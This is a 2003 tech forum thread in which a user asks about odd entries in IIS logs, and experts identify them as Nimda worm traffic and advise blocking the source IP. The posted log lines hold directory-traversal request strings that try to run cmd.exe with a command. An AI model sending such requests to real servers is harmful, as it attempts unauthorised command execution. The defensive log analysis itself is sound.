Why are there GET commands in my IIS Web Log files?

uopercival
uopercival used Ask the Experts™
on
I'm getting some GET commands from IPs that originate from my service provider. Any reason it's doing this?

2003-01-10 01:20:29 142.179.86.227 - 192.168.1.1 80 GET /scripts/root.exe /c+dir 404 -
2003-01-10 01:20:29 142.179.86.227 - 192.168.1.1 80 GET /MSADC/root.exe /c+dir 403 -
2003-01-10 01:20:31 142.179.86.227 - 192.168.1.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:31 142.179.86.227 - 192.168.1.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:32 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:32 142.179.86.227 - 192.168.1.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2003-01-10 01:20:33 142.179.86.227 - 192.168.1.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:33 142.179.86.227 - 192.168.1.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2003-01-10 01:20:34 142.179.86.227 - 192.168.1.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:34 142.179.86.227 - 192.168.1.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:35 142.179.86.227 - 192.168.1.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:35 142.179.86.227 - 192.168.1.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:37 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:37 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:38 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:38 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
Comment
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®

Commented:
contact your ISP.  The way it looks right now, seems like someone is trying to hack your web server.

Commented:
This is standard NIMDA Worm traffic.  You're OK, all the response codes are 4XX.  That means the server REJECTED the request.

Author

Commented:
Thanks jhance.. that would explain why about a week ago, the server picked up Nimba A and E. I had only activated the IIS Web server for about a week. Cleaned it off and did all the critical updates.
Does someone actually send out this stuff or is it originated from other peoples infected html scripts?
HTML5 and CSS3 Fundamentals

Build a website from the ground up by first learning the fundamentals of HTML5 and CSS3, the two popular programming languages used to present content online. HTML deals with fonts, colors, graphics, and hyperlinks, while CSS describes how HTML elements are to be displayed.

Commented:
NIMDA spreads mainly by cross directory transversal (as you see above).  It tries to use a misconfiguration in the IIS server to run CMD.EXE in the context of the IIS account's privilege and infect the server.

In your case, you're getting hit by attempts but the 404 means that the server is rejecting the request, which is as it should be.

the only concern is that it the originating IP address is YOUR system, you need to fix your problem.
VGR

Commented:
I was told that the shown IP@ is forged and so unreliable
Commented:
Nope.  NIMDA does not forge IP addresses.  The 142.179.86.227 is very likely the real culprit.

It appears to be a customer of TELUS, probably a DSL line customer.  Not at all uncommon.  If it persists, you may want to put an IP block on this address in your router or firewall.

Author

Commented:
I will continue to monitor the ip and put a block into the router if it persists. I have sent Telus some log files but who knows if they will actually do anything about it. Thanks for the help, it makes sense now.
VGR

Commented:
althought it doesn't change the fact that attempts end in the logfiles, I sometimes add in httpd.conf a "Deny X.X.X.X" line

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial